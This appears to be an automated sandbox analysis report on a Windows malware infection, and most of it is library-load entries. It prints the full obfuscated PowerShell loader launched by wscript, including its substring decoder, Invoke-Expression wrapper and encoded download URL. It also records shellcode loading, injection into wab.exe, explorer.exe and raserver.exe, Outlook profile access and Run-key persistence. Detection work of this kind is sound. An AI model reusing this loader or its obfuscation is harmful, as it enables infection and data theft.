Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll
Source: C:\Windows\explorer.exe Section loaded: dui70.dll
Source: C:\Windows\explorer.exe Section loaded: duser.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.fileexplorer.dll
Source: C:\Windows\explorer.exe Section loaded: uiribbon.dll
Source: C:\Windows\explorer.exe Section loaded: networkexplorer.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\raserver.exe File written: C:\Users\user\AppData\Roaming\834O80R0\834logri.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\raserver.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.1845941014.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Management.Automation.pdb source: powershell.exe, 00000010.00000002.1845941014.0000000007324000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, raserver.exe
Source: Binary string: RAServer.pdb source: raserver.exe
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL", ""cls;write 'Fantasibilledernes Ansttels", "", "", "0");
Source: Yara match File source: 00000014.00000002.1970441632.0000000006340000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1851059403.000000000C1B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1850596565.00000000086A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1839918830.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Scyphiform245)$global:Bonaire = [System.Text.Encoding]::ASCII.GetString($Unantiquated)$global:Prioritetshaverens=$Bonaire.substring($Marmorgulvenes,$Renhedsgraders)<#Kapselaabnere De
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Glutinate $Roup $Uncollared), (Skjortenaales142 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Congresses = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cassare)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Slyngelstregs, $false).DefineType($Banshee, $Beke
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Scyphiform245)$global:Bonaire = [System.Text.Encoding]::ASCII.GetString($Unantiquated)$global:Prioritetshaverens=$Bonaire.substring($Marmorgulvenes,$Renhedsgraders)<#Kapselaabnere De
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString, 25_2_00C8ACA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB780BE8 pushad ; retf 12_2_00007FFAAB780C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB8554BA push ebp; iretd 12_2_00007FFAAB855538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474EC78 pushfd ; retf 16_2_0474EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_075C1D28 push eax; mov dword ptr [esp], ecx 16_2_075C21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_075C21A8 push eax; mov dword ptr [esp], ecx 16_2_075C21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0826386A pushad ; retf 16_2_08263871
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0826387D pushfd ; retf 16_2_08263881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0826369D push ebx; iretd 16_2_082636DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224209AD push ecx; mov dword ptr [esp], ecx 20_2_224209B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235EB1E push esp; retn 0000h 20_2_2235EB1F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235EB02 push esp; retn 0000h 20_2_2235EB03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235E9B5 push esp; retn 0000h 20_2_2235EAE7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239EB1E push esp; retn 0000h 20_2_2239EB1F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239EB02 push esp; retn 0000h 20_2_2239EB03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239E9B5 push esp; retn 0000h 20_2_2239EAE7
Source: C:\Windows\explorer.exe Code function: 22_2_093569B5 push esp; retn 0000h 22_2_09356AE7
Source: C:\Windows\explorer.exe Code function: 22_2_09356B1E push esp; retn 0000h 22_2_09356B1F
Source: C:\Windows\explorer.exe Code function: 22_2_09356B02 push esp; retn 0000h 22_2_09356B03
Source: C:\Windows\explorer.exe Code function: 22_2_09AFD9B5 push esp; retn 0000h 22_2_09AFDAE7
Source: C:\Windows\explorer.exe Code function: 22_2_09AFDB02 push esp; retn 0000h 22_2_09AFDB03
Source: C:\Windows\explorer.exe Code function: 22_2_09AFDB1E push esp; retn 0000h 22_2_09AFDB1F
Source: C:\Windows\explorer.exe Code function: 22_2_0B316B1E push esp; retn 0000h 22_2_0B316B1F
Source: C:\Windows\explorer.exe Code function: 22_2_0B316B02 push esp; retn 0000h 22_2_0B316B03
Source: C:\Windows\explorer.exe Code function: 22_2_0B3169B5 push esp; retn 0000h 22_2_0B316AE7
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C929BD push ecx; ret 25_2_00C929D0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C9252C push ecx; ret 25_2_00C9253F
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044409AD push ecx; mov dword ptr [esp], ecx 25_2_044409B6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EC22A push BE707C3Eh; ret 25_2_001EC22F
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EC4B7 push eax; retf 25_2_001EC4B8
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001ED4A5 push eax; ret 25_2_001ED4F8
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001ED4FB push eax; ret 25_2_001ED562
Source: C:\Windows\SysWOW64\raserver.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KFRL5VBPUBT

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
